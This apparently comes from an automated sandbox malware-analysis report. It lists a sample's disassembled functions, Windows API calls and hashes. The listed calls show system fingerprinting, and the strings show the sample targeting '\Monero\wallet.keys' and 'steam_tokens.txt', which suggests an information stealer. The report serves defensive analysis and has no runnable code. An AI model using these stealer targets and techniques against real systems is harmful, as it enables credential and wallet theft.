Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 71cf7f7893eb2e17cc1a0d7d9e3eb6c86dfcb711aaceac5f95e2f8f5ede0e91f
Instruction ID: 993bdbc2d9aba98fa6b25dffec694ec95e529b48f040590a52e491cf6ce2d063
Opcode Fuzzy Hash: 71cf7f7893eb2e17cc1a0d7d9e3eb6c86dfcb711aaceac5f95e2f8f5ede0e91f
Instruction Fuzzy Hash: A9E0E670945308FBE7109BA19C1AB497A7C9B04B46F105155FB0DBB1D0CAB525449A59

Function 00961520 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00966FA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00966FE2
Part of subcall function 00966FA0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0096701F
Part of subcall function 00966FA0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009670A3
Part of subcall function 00966FA0: RtlAllocateHeap.NTDLL(00000000), ref: 009670AA

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 00967130: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967144
Part of subcall function 00967130: RtlAllocateHeap.NTDLL(00000000), ref: 0096714B

Part of subcall function 00967260: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0096D5B0,000000FF,?,009617A9,00000000,?,0120E2B8,00000000,?), ref: 00967292
Part of subcall function 00967260: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0096D5B0,000000FF,?,009617A9,00000000,?,0120E2B8,00000000,?), ref: 00967299

Part of subcall function 009672F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967320
Part of subcall function 009672F0: RtlAllocateHeap.NTDLL(00000000), ref: 00967327
Part of subcall function 009672F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096733F

Part of subcall function 00967380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009673B0
Part of subcall function 00967380: RtlAllocateHeap.NTDLL(00000000), ref: 009673B7
Part of subcall function 00967380: GetComputerNameA.KERNEL32(?,00000104), ref: 009673CF

Part of subcall function 00967420: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970DD0,00000000,?), ref: 00967450
Part of subcall function 00967420: RtlAllocateHeap.NTDLL(00000000), ref: 00967457
Part of subcall function 00967420: GetLocalTime.KERNEL32(?,?,?,?,?,00970DD0,00000000,?), ref: 00967464
Part of subcall function 00967420: wsprintfA.USER32 ref: 00967493

Part of subcall function 009674D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0120EAC0,00000000,?,00970DE0,00000000,?,00000000,00000000), ref: 00967503
Part of subcall function 009674D0: RtlAllocateHeap.NTDLL(00000000), ref: 0096750A
Part of subcall function 009674D0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0120EAC0,00000000,?,00970DE0,00000000,?,00000000,00000000,?), ref: 0096751D

Part of subcall function 009675A0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0120EAC0,00000000,?,00970DE0,00000000,?,00000000,00000000), ref: 009675D5

Part of subcall function 00967630: GetKeyboardLayoutList.USER32(00000000,00000000,0097059F), ref: 00967681
Part of subcall function 00967630: LocalAlloc.KERNEL32(00000040,?), ref: 00967699
Part of subcall function 00967630: GetKeyboardLayoutList.USER32(?,00000000), ref: 009676AD
Part of subcall function 00967630: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00967702
Part of subcall function 00967630: LocalFree.KERNEL32(00000000), ref: 009677C2

Part of subcall function 00967820: GetSystemPowerStatus.KERNEL32(?), ref: 0096784D

GetCurrentProcessId.KERNEL32(00000000,?,0120E1B8,00000000,?,00970DF4,00000000,?,00000000,00000000,?,0120EB80,00000000,?,00970DF0,00000000), ref: 00961B8E

Part of subcall function 00968F10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00968F24
Part of subcall function 00968F10: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00968F45
Part of subcall function 00968F10: CloseHandle.KERNEL32(00000000), ref: 00968F4F

Part of subcall function 009678A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009678D7
Part of subcall function 009678A0: RtlAllocateHeap.NTDLL(00000000), ref: 009678DE
Part of subcall function 009678A0: RegOpenKeyExA.KERNEL32(80000002,011FB690,00000000,00020119,?), ref: 009678FE
Part of subcall function 009678A0: RegQueryValueExA.KERNEL32(?,0120E078,00000000,00000000,000000FF,000000FF), ref: 0096791F
Part of subcall function 009678A0: RegCloseKey.ADVAPI32(?), ref: 00967932

Part of subcall function 00967A00: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00967A69
Part of subcall function 00967A00: GetLastError.KERNEL32 ref: 00967A78

Part of subcall function 00967970: GetSystemInfo.KERNEL32(00970DFC), ref: 009679A0
Part of subcall function 00967970: wsprintfA.USER32 ref: 009679B6

Part of subcall function 00967BA0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0120E8C8,00000000,?,00970DFC,00000000,?,00000000), ref: 00967BD0
Part of subcall function 00967BA0: RtlAllocateHeap.NTDLL(00000000), ref: 00967BD7
Part of subcall function 00967BA0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00967BF8
Part of subcall function 00967BA0: __aulldiv.LIBCMT ref: 00967C12
Part of subcall function 00967BA0: __aulldiv.LIBCMT ref: 00967C20
Part of subcall function 00967BA0: wsprintfA.USER32 ref: 00967C4C

Part of subcall function 00968260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970DF8,00000000,?), ref: 009682CF
Part of subcall function 00968260: RtlAllocateHeap.NTDLL(00000000), ref: 009682D6
Part of subcall function 00968260: wsprintfA.USER32 ref: 009682F0

Part of subcall function 00967DC0: RegOpenKeyExA.KERNEL32(00000000,0120ACC0,00000000,00020019,00000000,009705A6), ref: 00967E44

Part of subcall function 00967DC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00967EC6
Part of subcall function 00967DC0: wsprintfA.USER32 ref: 00967EF9
Part of subcall function 00967DC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00967F1B
Part of subcall function 00967DC0: RegCloseKey.ADVAPI32(00000000), ref: 00967F2C
Part of subcall function 00967DC0: RegCloseKey.ADVAPI32(00000000), ref: 00967F39

Part of subcall function 00968120: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0096816A
Part of subcall function 00968120: Process32First.KERNEL32(?,00000128), ref: 0096817E
Part of subcall function 00968120: Process32Next.KERNEL32(?,00000128), ref: 00968193
Part of subcall function 00968120: FindCloseChangeNotification.KERNEL32(?), ref: 00968201

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0096216B

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleLastLogicalMemoryModuleNextNotificationPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 1011861169-0
Opcode ID: 7ec871ae0437ab5908aa4a9c911b3ddf85b6b696d0f20bdaef7d6c0aef4b4998
Instruction ID: 4bbd9e5e15b78ebe1671c767b7d72b5e9943dd04607f91f4d45fcfe7013f0a3f
Opcode Fuzzy Hash: 7ec871ae0437ab5908aa4a9c911b3ddf85b6b696d0f20bdaef7d6c0aef4b4998
Instruction Fuzzy Hash: A0727072855118AACB19FB90DCA2FEEB33CAF95300F508299B11772091EF716B48DF65

Function 00956D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c5d3a99c5b46943d263bd3d1155c5f18e20d50075bc6c5dc7ee4558d3fa975
Instruction ID: e81c31cc7e8b7cf55f6c34090d098d8bc0c6d6d8ac808f09eb1e2daaaa6a442f
Opcode Fuzzy Hash: 97c5d3a99c5b46943d263bd3d1155c5f18e20d50075bc6c5dc7ee4558d3fa975
Instruction Fuzzy Hash: 876114B5D00208EFCF14DF95E984BEEB7B4BB48305F508598E805AB280D775AE98DF91

Function 00964BE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A1F0: lstrlen.KERNEL32(00954F55,?,?,00954F55,00970DC6), ref: 0096A1FB
Part of subcall function 0096A1F0: lstrcpy.KERNEL32(00970DC6,00000000), ref: 0096A255

lstrlen.KERNEL32(00000000,00000000,00970AB3), ref: 00964C0A

Strings

steam_tokens.txt, xrefs: 00964C1F

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: f427bf7ebf0085786d3da0f2b1029030fb74066fb38474714505808aec35b5d6
Instruction ID: 496432f4c9bcbfead8ead6e871c0a9379cb6f154eb0dbddba9c345148d3ed978
Opcode Fuzzy Hash: f427bf7ebf0085786d3da0f2b1029030fb74066fb38474714505808aec35b5d6
Instruction Fuzzy Hash: 67F0FB72D1010866CB04FBB0EC57AED772CABD5300F408268F81662092EF656A188BA6

Function 00951160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0095116A
ExitProcess.KERNEL32 ref: 0095117E

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: df6e0ad10f50cda4d743cb1fca83b2a5dbfccd18c7fb162adccbfc468a7babdc
Instruction ID: da774344060031c8579d28d1061ad7d113b3e311c1d217cab00cbdb2f881ec82
Opcode Fuzzy Hash: df6e0ad10f50cda4d743cb1fca83b2a5dbfccd18c7fb162adccbfc468a7babdc
Instruction Fuzzy Hash: 6CD05E7490420CDBCB00EFE09949ADDBF79AB0C212F10069EED0963240DB305889CB65

Function 0095B370 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00959E60: LocalAlloc.KERNEL32(00000040,?), ref: 00959EFE

lstrlen.KERNEL32(00000000), ref: 0095B820
lstrlen.KERNEL32(00000000), ref: 0095B834

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID:
API String ID: 3073930149-0
Opcode ID: cbbcf5580abd180762f7e32b2a45f17067cb1faf0690eac3930ee245ce5d765b
Instruction ID: 65e98b6627e4596a51f6b6028c6dc1518f758461c986e5d624b2788c283b7b9e
Opcode Fuzzy Hash: cbbcf5580abd180762f7e32b2a45f17067cb1faf0690eac3930ee245ce5d765b
Instruction Fuzzy Hash: 8CE1CC728141189BCB19FBA0CCA2FEE7338AF95300F404569F517761A1EF756A48CF62

Function 0095AD70 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

lstrlen.KERNEL32(00000000), ref: 0095AFEA
lstrlen.KERNEL32(00000000), ref: 0095AFFE

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
